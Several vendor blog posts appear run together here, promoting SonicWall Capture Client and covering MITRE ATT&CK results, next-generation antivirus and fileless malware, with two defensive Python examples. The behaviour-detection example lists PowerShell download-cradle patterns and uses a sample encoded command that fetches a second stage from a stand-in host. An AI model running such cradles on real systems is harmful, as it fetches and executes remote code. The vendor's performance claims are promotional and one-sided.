
What the 2023 MITRE ATT&CK Evaluation Results Mean for SonicWall Users

Note: Previously, we explained the MITRE ATT&CK framework and how security products are evaluated for detection efficacy and efficiency. Check out these blogs (Part 1 and Part 2) if you haven’t already.

The 2023 MITRE ATT&CK® Evaluations focused on the adversary Turla, a Russia-based threat group active since at least the early 2000s. Turla is known for deploying sophisticated proprietary tools and malware. It has targeted victims in over 45 countries, spanning a range of critical industries and infrastructure such as government agencies, diplomatic missions, military groups, research and education facilities, and media organizations.

But while Turla is unquestionably a formidable adversary, it proved no match for the SentinelOne-powered SonicWall Capture Client, as we’ll explore below.

Understanding MITRE ATT&CK and SonicWall Capture Client

Before we dive in, however, a bit of background on the MITRE ATT&CK evaluations and SonicWall Capture Client is likely to be helpful:

MITRE ATT&CK Evaluations: ATT&CK stands for “Adversarial Tactics, Techniques & Common Knowledge.” It’s designed to be a common language, the components of which are used in endless combinations to describe how threat actors operate. The MITRE Engenuity ATT&CK Evaluations are based on the MITRE ATT&CK knowledge base, a globally accessible repository of threat actor behaviors and techniques observed in real-world cyberattacks. The evaluations provide transparency and insight into how well different cybersecurity solutions can detect and prevent these tactics, as well as how they present relevant information to end users.

SonicWall Capture Client Endpoint Security: SonicWall Capture Client is a cutting-edge endpoint security solution powered by the SentinelOne Singularity platform. It leverages multiple layers of security – including real-time behavior monitoring, anti-ransomware technology and malware prevention – to automatically detect and prevent malicious activity in real time, without relying on signatures, rules or human intervention.

To reduce alert fatigue, Capture Client automatically stitches related alerts together, so that detections across all covered attack vectors are correlated into a small number of incidents and analysts see the full picture rather than a stream of isolated alerts.

Capture Client’s built-in, autonomous EDR provides automation and orchestration capabilities for rapid response and remediation actions. What’s more, Capture Client’s synergy with the rest of the SonicWall platform allows for increased visibility and protection both on and off the network.

The 2023 MITRE ATT&CK Evaluations

The 2023 MITRE ATT&CK Evaluations emulated Turla to test 30 cybersecurity vendors on their ability to detect and respond to an advanced real-world threat. Evaluation results are available on the official website, where you can view and compare the test data of each vendor across 143 sub-steps that represent the attack sequence of Turla. You can also filter the results by different criteria, such as detection type, telemetry type, platform or technique.

The test data consists of three main categories:

  • Visibility: Evaluates whether the vendor was able to detect a specific sub-step of the attack sequence and what type of telemetry (e.g., process, file, registry, network) was used to provide that detection. The higher the visibility score, the more sub-steps were detected by the vendor.
  • Analytic Quality: Evaluates the quality of the detection analytics (e.g., rules, signatures, models) used to identify a specific sub-step of the attack sequence. The analytic quality score ranges from 1 (lowest) to 5 (highest) based on criteria such as specificity, relevance, timeliness, accuracy and completeness. The higher the analytic quality score, the better the detection analytics were at capturing the adversary’s behavior.
  • Configuration Change: Evaluates whether the vendor required any configuration changes (e.g., enabling or disabling features, modifying settings) to achieve a specific detection. The configuration change score ranges from 0 (no change) to 2 (major change) based on criteria such as complexity, impact and documentation. The lower the configuration change score, the fewer changes were needed by the vendor.

SentinelOne: Once Again at the Front of the Pack

SonicWall customers trust our SentinelOne-powered Capture Client to protect them from the most advanced threats. In this year’s Evaluations, the exact agent, platform and features used to safeguard SonicWall users every day detected and blocked every phase of the Turla attack with zero delays and no unrealistic reconfigurations or bolt-on features.

It outperformed all other vendors in terms of detection and prevention capabilities, as well as analytic quality and configuration changes.

Figure 1 shows exactly what Capture Client (SentinelOne) achieved:

Figure 1: SentinelOne MITRE ATT&CK Evaluation results

These results highlight how the SentinelOne Singularity platform maps directly to the MITRE ATT&CK framework to deliver detection and prevention of advanced threat actor tactics, techniques and procedures (TTPs). SentinelOne Singularity XDR also surfaced this information to defenders without any configuration changes during the evaluation, which matters because there are no re-tests in the real world.

Figure 2: A closer look at SentinelOne evaluation results.

By choosing Capture Client (SentinelOne) for your organization, your organization can benefit from:

  • Autonomous Protection: Automatically detect and prevent malicious activity in real time across all attack surfaces.
  • High-Quality Analytics: Leverage high-quality analytics of threat behavior with specificity, relevance, timeliness, accuracy and completeness.
  • Zero Configuration Changes: Enjoy optimal performance without any configuration changes, reducing complexity and overhead.
  • Real-Time Visibility: Gain comprehensive visibility into the attack sequence and timeline, as well as threat intelligence, indicators of compromise (IOCs), root cause analysis and remediation steps.
  • Automation and Orchestration: Automate and orchestrate response and remediation actions with protection that integrates with other security tools and platforms.

Figure 3: Capture Client provides real-time visibility with Attack Storyline, which displays an attack in its entirety and combines alerts and individual events into a single, comprehensive view.

Conclusion

The MITRE ATT&CK Evaluation provides transparent and objective data that lets vendors and users compare cybersecurity solutions on their ability to detect and prevent real-world threats. For those looking to purchase a reliable and effective cybersecurity solution, these results can help determine which one best suits their needs and goals.

For four consecutive years, SonicWall Capture Client has proven its industry-leading detection and protection capabilities in the MITRE ATT&CK Enterprise Evaluations. You can request a demo or a free trial of Capture Client, or compare SonicWall Capture Client (SentinelOne) with other vendors on MITRE Engenuity’s website.

The Evolution of Next-Generation Antivirus for Stronger Malware Defense

Threat detection has evolved from static analysis to dynamic behavioral analysis that detects threatening behavior as it happens. Comprehensive layers of defense, properly placed within the network and on the endpoint, provide the best and most efficient detection and response capabilities to match today’s evolving threats.

For years, SonicWall offered endpoint protection built on traditional antivirus (AV) capabilities. It relied on what is known as static analysis. The word “static” is just like it sounds: traditional antivirus used static lists of hashes, signatures, behavioral rules and heuristics to discover viruses, malware and potentially unwanted programs (PUPs). It searched the entire operating system and mounted filesystems for these static artifacts, detecting malicious files retroactively through scheduled scans.

Traditional antivirus focuses on pre-execution prevention: its scanning mechanisms are primarily designed to stop a malicious binary before it runs. If we go back 20 years, this approach was very effective at blocking the majority of malware, and many antivirus companies built their businesses on execution prevention.

As that technology waned, the provider we had for traditional antivirus discontinued their legacy antivirus solution and SonicWall sought new and more effective alternatives.

Traditional Defenses Fail to Match the Threat

In the past, attackers determined to beat antivirus engines focused much of their attention on hiding their activities. At first, they simply packaged their executables in archive formats.

Some threat actors used multi-layer packaging, for example placing an executable in a zip and then placing that zip inside another archive format such as arj or rar. Traditional antivirus engines responded with file-type analysis and unpacking functions that scan the binaries contained inside, layer by layer.
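The following is an added example, not SonicWall's or any antivirus vendor's engine: a minimal static scanner in Python that hashes a blob, unpacks it in memory if it is a zip archive, and recurses into nested archives until it either finds a member whose SHA-256 is on a constructed "known bad" list or hits a nesting or inflation limit. The payload bytes, the hash list and the `build_nested_zip` helper are constructed for the demo; only zip is handled because it is in the standard library (arj and rar would need third-party unpackers). It also shows the weakness the rest of this page turns on: appending a single byte to the payload defeats the hash match.

```python
import hashlib
import io
import zipfile

MAX_DEPTH = 4                      # archives nested deeper than this are not opened
MAX_MEMBER_BYTES = 1024 * 1024     # inflate no single member past 1 MiB (zip-bomb guard)

# Constructed stand-in for a malicious binary, not real malware. The static
# "signature" for it here is simply its SHA-256; real engines also use byte
# patterns and heuristics, but the matching problem is the same.
PAYLOAD = b"MZ\x90\x00 constructed demo payload, not real malware\n"
KNOWN_BAD_SHA256 = {hashlib.sha256(PAYLOAD).hexdigest()}


def build_nested_zip(inner, layers):
    """Wrap `inner` in `layers` zip archives (innermost member: payload.bin),
    the multi-layer packaging trick described in the text. Constructed helper."""
    data, name = inner, "payload.bin"
    for i in range(layers):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr(name, data)
        data, name = buf.getvalue(), "layer%d.zip" % i
    return data


def scan_blob(blob, path="<root>", depth=0, report=None):
    """Hash `blob`; if it is a zip archive, unpack each member in memory and
    recurse. Returns {"hits": [member paths], "skipped": [reasons]}."""
    if report is None:
        report = {"hits": [], "skipped": []}
    if hashlib.sha256(blob).hexdigest() in KNOWN_BAD_SHA256:
        report["hits"].append(path)
    if not zipfile.is_zipfile(io.BytesIO(blob)):
        return report
    if depth >= MAX_DEPTH:
        report["skipped"].append("%s [nested deeper than %d]" % (path, MAX_DEPTH))
        return report
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            member_path = "%s/%s" % (path, info.filename)
            # Read with a hard cap instead of trusting the declared file_size,
            # which a crafted header can understate.
            with zf.open(info) as member:
                data = member.read(MAX_MEMBER_BYTES + 1)
            if len(data) > MAX_MEMBER_BYTES:
                report["skipped"].append(
                    "%s [inflates past %d bytes]" % (member_path, MAX_MEMBER_BYTES))
                continue
            scan_blob(data, member_path, depth + 1, report)
    return report


if __name__ == "__main__":
    print(scan_blob(build_nested_zip(PAYLOAD, 3)))             # found three layers down
    print(scan_blob(build_nested_zip(PAYLOAD + b"\x00", 3)))   # one extra byte: no hit
    print(scan_blob(build_nested_zip(PAYLOAD, 6)))             # too deep: skipped, no hit
```

The depth and inflation caps are not optional in a real engine: without them an attacker who cannot evade the scanner can still exhaust it with a deeply nested or highly compressible archive, which is its own denial-of-service problem.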

Threat actors then figured out how to leverage documents and spreadsheets, especially Microsoft Word and Excel, whose support for embedded macros gave rise to the “macro virus.”

Antivirus vendors had to become document macro experts, and Microsoft got wise and disabled macros by default in their documents (requiring user enablement). But cybercriminals didn’t stop there. They continued to evolve the way they used content to infect systems.

Fast forward to today. Threat actors now use so many techniques to hide from static analysis engines that the sandbox detection engine became a popular answer.

I often use an analogy to explain a malware sandbox. It’s akin to a petri dish in biology where a lab technician or doctor examines a germ in a dish and watches its growth and behavior using a microscope.

Behavioral Sandbox Analysis

Sandbox technologies detect malware by running it inside virtual or emulated operating systems and recording what it does there, exposing its intent. As sandboxing became more prevalent, threat actors redesigned their malware to recognize and evade sandboxes (for example, by staying dormant when it detects a virtualized or instrumented environment).

This led SonicWall to develop advanced real-time memory monitoring to detect malware designed to evade sandbox technology. Today, SonicWall uses a multitude of capabilities, coupled with patent-pending Real-Time Deep Memory Inspection (RTDMI™), to identify and mitigate malware more effectively than competing solutions.

SonicWall Automated Real-Time Breach Prevention & Detection

The Endpoint Evolves, Shares Intelligence

Next comes the endpoint. Most enterprises and small businesses are mobile today, so a comprehensive defense against malware, and the compliance that goes with it, must protect remote users and devices as they move beyond the organization’s perimeter. This puts the emphasis on combining network security with endpoint security.

Years ago, I wrote research at Gartner about the gaps in the market. There was a critical need to bridge network, endpoint and other adjacent devices together into a shared intelligence and orchestrated fabric. I called it “Intelligence Aware Security Controls (IASC).”

The core concept of IASC is that an orchestration fabric must exist between different security technology controls. This ensures that each control is aware of a detection event and other shared telemetry so that every security control can take that information and automatically respond to threats that emerge across the fabric.

So, for example, a botnet threat detection at the edge of the network can inform firewalls that are deployed deeper in the datacenter to adjust policies according to the threat emerging in the environment.

As Tomer Weingarten, CEO of SentinelOne said, “Legacy antivirus is simply no match for today’s sophisticated file-based malware, which proliferates much faster than new signatures can be created.”

Limitations of Legacy Antivirus (AV) Technology

To better understand the difference between legacy antivirus (AV) and next-generation antivirus (NGAV), we should know the advantages and unique features of NGAV over legacy signature-based AV solutions. Below are four primary limitations of legacy offerings.

  • Frequent updates. Traditional AV solutions require frequent (i.e., daily or weekly) updates of their signature databases to protect against the latest threats. This approach doesn’t scale well. In 2017 alone, SonicWall collected more than 56 million unique malware samples.
  • Invasive disk scans. Traditional AV solutions recommend recurring disk scans to ensure threats did not get in. These recurring scans are a big source of frustration for end users, as productivity is impacted during lengthy scans.
  • Cloud dependency. Traditional AV solutions are reliant on cloud connectivity for best protection. Signature databases have grown so large that it is no longer possible to push the entire database to the device. So, they keep the vast majority of signatures in the cloud and only push the most prevalent signatures to the agent.
  • Remote risk. When end users work in cafés, airports, hotels and other commercial facilities, the Wi-Fi provider is often supported by ad revenue and encourages users to download the host’s tools (i.e., adware) in exchange for free connectivity. These tools, or the Wi-Fi access point itself, can easily block access to the AV cloud, which poses a serious security risk.

Switching to Real-time, Behavior-focused Endpoint Protection

Considering these limitations, there is a need for viable replacement of legacy AV solutions. For this reason, SonicWall partnered with SentinelOne to deliver a best-in-class NGAV and malware protection solution: SonicWall Capture Client.

SonicWall Capture Client is a unified endpoint offering with multiple protection capabilities. With a next-generation malware protection engine powered by SentinelOne, Capture Client applies advanced threat protection techniques, such as machine learning, network sandbox integration and system rollback. Capture Client uses automated intelligence to adapt and detect new strains of malware through advanced behavior analytics.

SonicWall Capture Client was a direct response to multiple market trends.

  • First, there has been a detection and response focus, which is why SentinelOne offers our customers the ability to detect and then select the response in workflows (along with a malware storyline).
  • Second, devices going mobile and outside the perimeter meant that backhauling traffic to a network device was not satisfying customers who wanted low latency network traffic for their mobile users (and, frankly, the extra bandwidth costs that go along with it).
  • Third, because of all the evasion techniques that attackers use, a real-time behavioral engine is preferred over a static analysis engine to detect advanced attacks.
  • Fourth, the Capture Client SentinelOne threat detection module’s deep file inspection engine sometimes detects low confidence or “suspicious” files or activities. In these low confidence scenarios, Capture Client engages the advanced sandbox analysis of RTDMI to deliver a much deeper analysis and verdict about the suspicious file/activity.

One crucial feature of the latest Capture Client solution is the ability to record all the behaviors of an attack and the processes involved on an endpoint into an attack storyline — essential for security operations detection, triage and response efforts.

By listening to the market and focusing on the four key points above, SonicWall delivered best-in-class protection for endpoints, and another important milestone in SonicWall’s mission to provide automated, real-time breach detection and prevention.

SonicWall Capture Client combines multiple technologies to provide the most efficient and effective defense against threat actors. The solution should be paired with a defense-in-depth security strategy across all the key layers of transport, including email, network and endpoints.

What is the Difference Between Traditional and Next-Generation Anti-Virus?

In previous webcasts and blogs, I’ve spoken of a woman, Elizabeth, who was the victim of a terrible ransomware attack as well as an intrusion on her computer. It was her first computer breach in over 25 years of business.

When these happened, she was running traditional anti-virus and minimal network security in front of her endpoints. These two attacks, which she believes cost her around $50,000 in damages, were alarming wakeup calls to the realities of today’s threat landscape.

One of the lessons learned by people like Elizabeth over the past three years of the ransomware age is that traditional signature-based anti-virus solutions are lacking the power to combat today’s flood of evasive malware.

This is why SonicWall is excited to launch our Capture Client, a client security solution that leverages the SentinelOne Endpoint Protection engine, powered by static and behavioral artificial intelligence, to deliver next-generation anti-virus (NGAV) capabilities.

So, what exactly is a NGAV solution, and why does it matter?

No signatures

Traditionally, anti-virus solutions (AVs) have required frequent (daily or weekly) updates of their signature databases to protect against the latest threats. Capture Client uses a static artificial intelligence (AI) engine to determine if new files are threats before they can execute. In addition, it has a behavioral AI engine to protect against file-less threats (e.g., PowerShell scripts, macros within documents, lateral movement, etc.).

No weekly updates

These AI engines do not require daily/weekly updates, as they “degrade” very gracefully over time. This is because the behavior analysis engines do the work instead of matching files to an ever-aging database of file IDs.

Even if customers upgrade their agents only once a year, they will have much greater protection than what traditional AV is able to provide. With the power of SentinelOne’s AI models, today’s zero-day attacks are instantly convicted by models developed in the past. This is the benefit of a mathematical approach to malware prevention, detection and response versus legacy, signature-based approaches.

No recurring scans

Apart from the management overhead of updating signatures, traditional AVs also recommend recurring disk scans to make sure threats did not get in. These recurring scans are a big source of frustration for the end users, as their productivity is impacted during the scans. With Capture Client, these recurring scans are not required at all. End-users get much better performance and, in many cases, do not even know or experience any slowdown caused by the AV.

No performance overhead

Another reason for the poor performance of traditional AVs is that they became bloated by implementing many features, such as endpoint firewall, full-disk encryption, etc. Many of these features are now available on modern operating systems. Capture Client was designed to orchestrate OS functionality instead of replicating it. This also translates into a much better end-user experience.

No cloud dependence

Another limitation of traditional AVs is their reliance on cloud connectivity for best protection. Signature databases have grown so large that it is no longer possible to push the entire database down to the device. So, they keep the vast majority of signatures in the cloud, and only push the most prevalent signatures down to the agent.

Furthermore, end users frequently work in cafés, airports, hotels and other commercial facilities. In most of these cases, the Wi-Fi provider is supported by ad revenue and encourages users to download the host’s tools (i.e., adware) to get free connectivity. These tools, or the Wi-Fi access point itself, can easily block access to the AV cloud, which poses a serious security risk. Capture Client is fully autonomous and protects the user in these situations: the efficacy of the agent does not depend on its connection to the internet.

NGAV for endpoints

I invite you to learn more about Capture Client, which not only provides NGAV capabilities, but also seamlessly integrates with SonicWall firewalls and related capabilities, such as DPI-SSL certificate management, firewall enforcement and firewall-independent, cloud-based reporting.

To learn more, download the “SonicWall Capture Client powered by SentinelOne” data sheet.

How to Stop Fileless Malware

In 2017, SonicWall Capture Labs discovered 56 million new forms of malware from across the globe. Threat actors are constantly creating updates to known versions of malware to get past defenses that rely on identifying malware (i.e., signatures). The forms of security that stop malware and ransomware based on signatures are only effective if they can identify the strain.

Since malware authors don’t want to continually update their code and have attacks in flight fail, they often resort to creating fileless malware as a highly effective alternative.

What is fileless malware?

Fileless malware has been around for some time, but has dramatically increased in popularity in the last few years. It leverages on-system tools such as PowerShell, macros (as in Microsoft Word and Excel), Windows Management Instrumentation (WMI) or other built-in scripting functionality to propagate, execute and perform whatever tasks it was developed to perform, without dropping a conventional executable on disk.

The problem for the business

One of the reasons fileless malware is so powerful is that security products cannot simply block the systems or software it uses. If a security admin blocked PowerShell, for example, many IT maintenance tasks would stop working. Its low footprint and the absence of a file to scan also make it very hard for signature-based security solutions to detect or prevent.

How can SonicWall stop fileless malware?

The key is not to look at the file but, instead, look at how it behaves when it runs on the endpoint. This is effective because although there is a large and increasing number of malware variants, they operate in very similar ways. This is similar to how we educate our children to avoid people based on behavior instead of showing them a list of mug shots every time they leave home.

SonicWall Capture Client, powered by SentinelOne, is a next-generation antivirus endpoint protection platform that uses multiple engines, including static and behavioral AI, to stop malware before, during and even after execution. It also offers the ability to roll back an endpoint to a state before the malware got on to or activated on the system.

Against fileless malware, full behavioral monitoring is highly effective at detecting and preventing the attack because it is agnostic to the attack vector: it does not matter whether the malicious activity arrived as a binary, a macro or a script.

How does it work?

SonicWall actively monitors all activities on the agent side at the kernel level to differentiate between malicious and benign activities. Once Capture Client detects malicious activity, it can effectively mitigate an attack and, if needed, roll back any damage, allowing the user to work on a clean device.
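As an added example (not Capture Client's or SentinelOne's detection logic, whose internals the page does not describe), the Python below runs behaviour-based rules over constructed process-creation events in the shape of Sysmon-style telemetry. It flags the fileless patterns named above (an Office application spawning a script host, the WMI provider host spawning a shell, and a PowerShell download cradle hidden behind -EncodedCommand) while leaving an ordinary administrative PowerShell command alone, and reconstructs the parent chain for each finding. The event schema, rule names, the `example.invalid` URL and the sample events are all assumptions made for the demo.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download-cradle and evasion markers. Checked against the raw command line
# and against the decoded form of any -EncodedCommand payload, so base64
# wrapping alone does not hide them.
CRADLE_RE = re.compile(
    r"(?i)(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"
    r"|Invoke-Expression|\biex\b|FromBase64String|-nop\b|-noni\b"
    r"|-w(indowstyle)?\s+hidden|-ep\s+bypass|ExecutionPolicy\s+Bypass)")
ENCODED_RE = re.compile(r"(?i)-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument
    (base64 over UTF-16LE), or '' if there is none or it does not decode."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def lineage(ev, by_pid):
    """Parent chain 'a.exe > b.exe > c.exe' for one event, the seed of the
    kind of attack storyline the text describes."""
    names, seen = [], set()
    while ev is not None and ev["pid"] not in seen:
        seen.add(ev["pid"])
        names.append(ev["image"])
        ev = by_pid.get(ev["ppid"])
    return " > ".join(reversed(names))


def analyze(events):
    """Walk process-creation events in order and return a list of
    (rule, lineage, detail) findings. Nothing here inspects file contents."""
    by_pid, findings = {}, []
    for ev in events:
        by_pid[ev["pid"]] = ev
        chain = lineage(ev, by_pid)
        image = ev["image"].lower()
        parent = by_pid.get(ev["ppid"], {}).get("image", "").lower()
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append(("office_spawns_script_host", chain, ev["cmdline"]))
        if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
            findings.append(("wmi_spawns_script_host", chain, ev["cmdline"]))
        if image in POWERSHELL:
            for label, text in (("cmdline", ev["cmdline"]),
                                ("decoded", decode_encoded_command(ev["cmdline"]))):
                m = CRADLE_RE.search(text)
                if m:
                    findings.append(("powershell_cradle_or_evasion", chain,
                                     "%s: %s" % (label, m.group(0))))
    return findings


# Constructed sample events (pid/ppid/image/cmdline), not captured telemetry.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED_STAGE2 = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "WINWORD.EXE",  "cmdline": '"WINWORD.EXE" invoice.docm'},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED_STAGE2},
    {"pid": 400, "ppid": 1,   "image": "svchost.exe",  "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 500, "ppid": 400, "image": "WmiPrvSE.exe", "cmdline": "WmiPrvSE.exe"},
    {"pid": 600, "ppid": 500, "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami > c:\\users\\public\\w.txt"},
    {"pid": 700, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service | Where-Object Status -eq Running"},
]

if __name__ == "__main__":
    for rule, chain, detail in analyze(SAMPLE_EVENTS):
        print("%-30s %s | %s" % (rule, chain, detail))
```

The point of the last sample event is the one the text makes: PowerShell itself is not the signal. The same binary run from Explorer with an ordinary administrative command produces no finding, while the same binary spawned by Word with an encoded cradle produces three, all tied to one parent chain that an analyst can read as a single story.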

Conclusion

Ultimately, adversaries will always take the shortest path to compromise endpoints to ensure the highest return with the least amount of effort. Fileless malware is quickly becoming one of the most popular ways to do so. It is not enough to just block essential operations like PowerShell.

You need anti-virus software that fully monitors the behavior of a system to prevent attacks that use exploits, macro documents, exploit kits, PowerShell, PowerSploit and zero-day vulnerabilities, locally and without depending on network connectivity.

To learn more, download the in-depth data sheet, “SonicWall Capture Client powered by SentinelOne.”

Webinar: Stop Fileless Malware with SonicWall Capture Client

Join SonicWall and SentinelOne cyber security experts to learn how to stay safe from advanced cyber threats like fileless malware.